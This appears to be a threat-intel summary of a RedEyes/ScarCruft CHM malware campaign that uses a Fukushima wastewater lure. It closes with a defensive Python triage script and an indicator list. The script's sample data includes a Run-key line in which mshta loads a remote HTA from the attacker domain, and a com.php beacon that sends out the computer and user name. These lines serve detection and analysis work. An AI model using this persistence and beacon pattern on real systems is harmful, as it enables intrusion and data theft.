RedEyes (ScarCruft)'s CHM Malware Using the Topic of Fukushima Wastewater Release

2023-09-08 Ahnlab

https://asec.ahnlab.com/en/56857/

AhnLab ASEC reported renewed CHM malware distribution assessed as likely RedEyes/ScarCruft activity, using Korean interest in the Fukushima wastewater release as the lure. The CHM file registers an mshta command under the HKCU Run key, then retrieves JavaScript from navercorp[.]ru to execute encoded PowerShell. The decoded backdoor maintains persistence, polls com.php with the victim computer and user name, and can upload or download files, enumerate file metadata, modify the registry, schedule tasks, rename files, and delete data. ASEC linked the command structure to earlier RedEyes CHM and M2RAT activity and listed Downloader/CHM.Generic plus the navercorp[.]ru URLs as indicators.
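The two observable stages of that chain, the Run-key value that launches mshta against a remote URL and the HTTP polling of com.php on navercorp[.]ru, lend themselves to simple host and proxy triage. The following Python is an added example and is not code from ASEC or from the report: it parses `reg query` output for the HKCU Run key and a constructed proxy-log layout, and flags mshta persistence, requests to the listed IOC domain, and the com.php polling path. The navercorp.ru paths, the query-parameter names, the host names and the IP addresses in the sample input are constructed placeholders; the report truncates the real URLs and does not give the beacon's parameter format.

```python
import re
from urllib.parse import urlsplit

# Domain the ASEC report lists as an indicator (matched plainly here, defanged in prose).
IOC_DOMAINS = {"navercorp.ru"}

# Script host the chain abuses for Run-key persistence.
SCRIPT_HOST = "mshta"

# `reg query` value lines look like "    <name>    REG_xx    <data>" (columns split by runs of spaces).
_REG_VALUE = re.compile(r"^\s+(?P<name>\S.*?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")
_REMOTE = re.compile(r"(?i)(?:https?://|vbscript:|javascript:)\S+")
# Constructed proxy log layout: "<timestamp> <client_ip> <method> <url> <status>"
_PROXY = re.compile(r"^(\S+)\s+(\S+)\s+([A-Z]+)\s+(\S+)\s+(\d{3})")


def parse_reg_query(text):
    """Return (name, type, data) for each value line of `reg query` output."""
    values = []
    for line in text.splitlines():
        m = _REG_VALUE.match(line)
        if m:
            values.append((m["name"], m["type"], m["data"]))
    return values


def _host(url):
    """Lower-cased host of a URL; empty for vbscript:/javascript: URIs."""
    return (urlsplit(url).hostname or "").lower()


def suspicious_run_values(reg_output):
    """Flag Run-key values that launch mshta, noting remote URLs and known IOC domains."""
    hits = []
    for name, _type, data in parse_reg_query(reg_output):
        if SCRIPT_HOST not in data.lower():
            continue
        reasons = ["mshta in Run key"]
        urls = _REMOTE.findall(data)
        if urls:
            reasons.append("remote or script: URL")
        if any(_host(u) in IOC_DOMAINS for u in urls):
            reasons.append("known IOC domain")
        hits.append({"value": name, "urls": urls, "reasons": reasons})
    return hits


def suspicious_proxy_lines(lines):
    """Flag requests to IOC domains and polling of a com.php endpoint."""
    hits = []
    for line in lines:
        m = _PROXY.match(line)
        if not m:
            continue
        ts, client, method, url, _status = m.groups()
        reasons = []
        if _host(url) in IOC_DOMAINS:
            reasons.append("known IOC domain")
        if urlsplit(url).path.rsplit("/", 1)[-1].lower() == "com.php":
            reasons.append("com.php polling path")
        if reasons:
            hits.append({"ts": ts, "client": client, "method": method, "url": url, "reasons": reasons})
    return hits


# Constructed sample input. The navercorp.ru paths, the com.php query parameters,
# the computer/user names and the client IPs are placeholders, not values from the report.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    WinUpdate    REG_SZ    mshta http://navercorp.ru/CONSTRUCTED/loader.hta
"""

SAMPLE_PROXY_LOG = [
    "2023-09-05T09:00:01Z 10.0.0.12 GET http://navercorp.ru/CONSTRUCTED/loader.hta 200",
    "2023-09-05T09:00:07Z 10.0.0.12 POST http://navercorp.ru/CONSTRUCTED/com.php?pc=DESKTOP-1234&user=alice 200",
    "2023-09-05T09:01:00Z 10.0.0.13 GET https://www.example.com/index.html 200",
]

if __name__ == "__main__":
    for h in suspicious_run_values(SAMPLE_REG_QUERY):
        print("RUN KEY:", h)
    for h in suspicious_proxy_lines(SAMPLE_PROXY_LOG):
        print("PROXY:", h)
```

On a live host the registry text would come from `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`; the mshta check is deliberately independent of the domain match, since the same persistence pattern survives infrastructure changes while the domain indicator does not.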

Indicators of Compromise

Type         Value                               First Seen   Last Seen
HASH (MD5)   52f71fadf0ea5ffacd753e83a3d0af1a    2023-09-04   2023-09-08
URL          http://navercorp.ru/dashboard/i…    2023-09-04   2023-09-08
URL          http://navercorp.ru/dashboard/i…    2023-09-04   2023-09-08
DOMAIN       navercorp.ru                        2023-09-04   2023-09-08
